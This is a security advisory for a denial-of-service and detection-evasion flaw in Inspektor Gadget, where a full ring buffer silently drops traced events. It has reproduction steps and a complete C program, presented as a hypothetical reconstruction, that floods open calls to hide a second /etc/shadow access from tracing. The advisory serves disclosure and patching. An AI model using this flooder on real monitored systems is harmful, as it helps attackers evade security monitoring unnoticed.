Inspektor Gadget Denial-of-Service Vulnerability via Event Dropping
Vulnerability
A denial-of-service vulnerability has been identified in Inspektor Gadget versions prior to 0.50.1. When the ring buffer that carries events from a gadget's eBPF program to userspace is full, whether by accident or by design, new events are dropped without any indication to the consumer. A malicious event source, such as a compromised container, can exploit this by generating events fast enough to keep the buffer full, disrupting event processing for other containers on the same host as well as for itself. This is particularly concerning where the tracing is relied on for security monitoring, because an attacker can time a sensitive action to coincide with the flood and evade detection.
Impact
Exploitation causes events produced by the gadget's eBPF programs to be lost before they reach userspace, disrupting monitoring and tracing. Because the ring buffer is shared, the loss is not confined to the flooding workload: events from any traced container can be dropped for as long as the flood lasts. Where the tracing is used for security purposes, this amounts to a detection bypass, since the lost events leave no trace in the gadget's output.
Reproduction
To reproduce this vulnerability, set up a Linux host and install Inspektor Gadget version 0.48.0. In one terminal run 'ig run trace_open -c poc-flood-evasion' (the '-c' flag restricts tracing to the container named poc-flood-evasion) and pipe its output through grep for 'shadow'. In another terminal, execute a script that compiles and runs a program designed to flood the ring buffer with open events. The program's first access to '/etc/shadow' is reported by the gadget; its second access, performed while the buffer is being flooded, is silently dropped and never appears in the output.
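The following is an added example, not the advisory's PoC and not Inspektor Gadget code: a hypothetical reconstruction of the flooder the reproduction describes. It issues one open(2) on a sensitive path, forks workers that hammer a benign path with open(2) calls so that trace_open's ring buffer fills, then issues a second open(2) on the sensitive path while the flood is in flight. The worker count, iteration count and flood path are assumptions; whether the second open is actually dropped depends on the ring buffer size and on how quickly ig drains it.

```c
/*
 * Added example (hypothetical reconstruction of the flooder described in the
 * advisory; not the original PoC, not Inspektor Gadget code). Paths, worker
 * count and iteration count are assumptions chosen for illustration.
 */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Issue n open(2) calls on path and return how many were issued. A failed
 * open (e.g. EACCES on /etc/shadow) still enters the kernel and still
 * produces a trace_open event, so failures are counted as well. */
long issue_opens(const char *path, long n) {
    long issued = 0;
    for (long i = 0; i < n; i++) {
        int fd = open(path, O_RDONLY);
        if (fd >= 0)
            close(fd);
        issued++;
    }
    return issued;
}

/* Run the PoC sequence: baseline sensitive open, flood, second sensitive
 * open during the flood. Returns the total number of flood opens reported
 * back by the workers, or -1 if the reporting pipe could not be created. */
long run_poc(const char *sensitive, const char *flood_path,
             int nworkers, long per_worker) {
    int pipefd[2];
    if (pipe(pipefd) < 0)
        return -1;

    /* 1. Baseline access: expected to show up in the gadget's output. */
    issue_opens(sensitive, 1);

    /* 2. Fork the flooders. Each reports its own count through the pipe. */
    for (int w = 0; w < nworkers; w++) {
        pid_t pid = fork();
        if (pid < 0)
            continue;
        if (pid == 0) {
            close(pipefd[0]);
            long done = issue_opens(flood_path, per_worker);
            if (write(pipefd[1], &done, sizeof done) != (ssize_t)sizeof done)
                _exit(1);
            _exit(0);
        }
    }
    close(pipefd[1]);

    /* 3. Second sensitive access while the buffer is under pressure: the
     *    advisory reports that this event is silently lost before 0.50.1. */
    issue_opens(sensitive, 1);

    /* Collect worker counts; read() returns 0 once every writer has exited. */
    long total = 0, v;
    while (read(pipefd[0], &v, sizeof v) == (ssize_t)sizeof v)
        total += v;
    close(pipefd[0]);
    while (wait(NULL) > 0)
        ;
    return total;
}

int main(void) {
    long total = run_poc("/etc/shadow", "/dev/null", 4, 200000);
    printf("flood opens issued: %ld\n", total);
    return total < 0;
}
```

Run it inside the traced container while 'ig run trace_open -c poc-flood-evasion | grep shadow' is active in the other terminal; on an affected version only the first '/etc/shadow' line appears. The flood volume needed is host-dependent, so increase the worker or iteration count if both accesses are still reported.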
Remediation
Upgrade to Inspektor Gadget version 0.50.1 or later, which addresses this vulnerability.
